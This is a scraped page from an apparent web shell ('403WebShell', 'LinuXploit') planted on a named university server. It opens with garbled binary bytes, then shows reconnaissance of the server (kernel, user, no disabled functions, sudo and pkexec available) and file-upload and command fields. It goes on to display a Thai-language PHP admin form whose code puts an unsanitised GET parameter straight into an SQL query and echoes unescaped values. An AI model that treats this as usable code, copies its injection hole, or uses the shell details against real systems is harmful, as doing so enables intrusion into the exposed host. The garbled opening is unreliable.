h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/trr/sample/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/trr/sample/lifestyle_population_edit.php
<?php include 'check_mode_admin.php';?>
<?php include 'admin_dbconnect.php';?>
<?php include 'header.php';?>

            <div class="row">
                <div class="col-lg-12">
                    <h1 class="page-header">แก้ไขข้อมูล</h1>
              </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
            <div class="row">
                <div class="col-lg-12">
<?php
	$ref_lifestyletype_pop_id=$_GET['ref_lifestyletype_pop_id'];
	$strSQL = "SELECT * FROM ref_lifestyletype_population WHERE ref_lifestyletype_pop_id=" . $ref_lifestyletype_pop_id ;
	$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");	
	if($objResult = mysql_fetch_array($objQuery))
	{
?>		
					<form action="lifestyle_population_edit_db.php" method="post" name="form1" id="form1">
                                        <div class="form-group">
                                            <label>จังหวัด</label>
                                            <input name="ref_lifestyletype_pop_province" class="form-control" id="ref_lifestyletype_pop_province" value="<?php echo $objResult["ref_lifestyletype_pop_province"];?>" size="100" maxlength="100">
                                        </div>	
										<div class="form-group">
                                            <label>อำเภอ</label>
                                            <input name="ref_lifestyletype_pop_district" class="form-control" id="ref_lifestyletype_pop_district" value="<?php echo $objResult["ref_lifestyletype_pop_district"];?>" size="50" maxlength="50">
                                        </div>	
										<div class="form-group">
                                            <label>ตำบล</label>
                                            <input name="ref_lifestyletype_pop_subDistrict" class="form-control" id="ref_lifestyletype_pop_subDistrict" value="<?php echo $objResult["ref_lifestyletype_pop_subDistrict"];?>" size="50" maxlength="50">
                                        </div>	
										<div class="form-group">
                                            <label>หมู่บ้าน</label>
                                            <input name="ref_lifestyletype_pop_village" class="form-control" id="ref_lifestyletype_pop_village" value="<?php echo $objResult["ref_lifestyletype_pop_village"];?>" size="30" maxlength="30">
                                        </div>	
										<div class="form-group">
                                            <label>จำนวนครัวเรือน</label>
                                            <input name="ref_lifestyletype_pop_householdNum" class="form-control" id="ref_lifestyletype_pop_householdNum" value="<?php echo $objResult["ref_lifestyletype_pop_householdNum"];?>" size="4" maxlength="4">
                                        </div>	
										<div class="form-group">
                                            <label>จำนวนประชากร</label>
                                            <input name="ref_lifestyletype_pop_num" class="form-control" id="ref_lifestyletype_pop_num" value="<?php echo $objResult["ref_lifestyletype_pop_num"];?>" size="4" maxlength="4">
                                        </div>	
										<div class="form-group">
                                            <label>ได้สัญชาติ</label>
                                            <input name="ref_lifestyletype_pop_nationallity" class="form-control" id="ref_lifestyletype_pop_nationallity" value="<?php echo $objResult["ref_lifestyletype_pop_nationallity"];?>" size="20" maxlength="20">
                                        </div>	
										<div class="form-group">
                                            <label>ไม่ได้สัญชาติ</label>
                                            <input name="ref_lifestyletype_pop_Notnationallity" class="form-control" id="ref_lifestyletype_pop_Notnationallity" value="<?php echo $objResult["ref_lifestyletype_pop_Notnationallity"];?>" size="20" maxlength="20">
                                        </div>	
										<div class="form-group">
                                            <label>ละติจูด	</label>
                                            <input name="latitude" class="form-control" id="latitude" value="<?php echo $objResult["latitude"];?>" size="50" maxlength="50">
                                        </div>	
										<div class="form-group">
                                            <label>ลองจิจูด</label>
                                            <input name="longitude" class="form-control" id="longitude" value="<?php echo $objResult["longitude"];?>" size="50" maxlength="50">
                                        </div>					
										<div class="form-group">
                                            <label>ลิงค์</label>
                                            <input name="ref_lifestyletype_pop_link" class="form-control" id="ref_lifestyletype_pop_link" value="<?php echo $objResult["ref_lifestyletype_pop_link"];?>" size="30" maxlength="30">
                                        </div>		

                                        <div class="form-group">
											<input name="submit" type="submit" id="submit" value="บันทึกข้อมูล" class="btn btn-success">
											&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
											<a href='javascript:history.back(1);'><button type="button" class="btn btn-warning">ยกเลิก</button></a>
											<input name="ref_lifestyletype_pop_id" type="hidden" id="ref_lifestyletype_pop_id" value="<?php echo $ref_lifestyletype_pop_id;?>" />
                                        </div>	
					</form>
<?php
	}
	else
	{
		echo "ไม่พบข้อมูล";
	}
?>
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->

<?php include 'sidebar.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit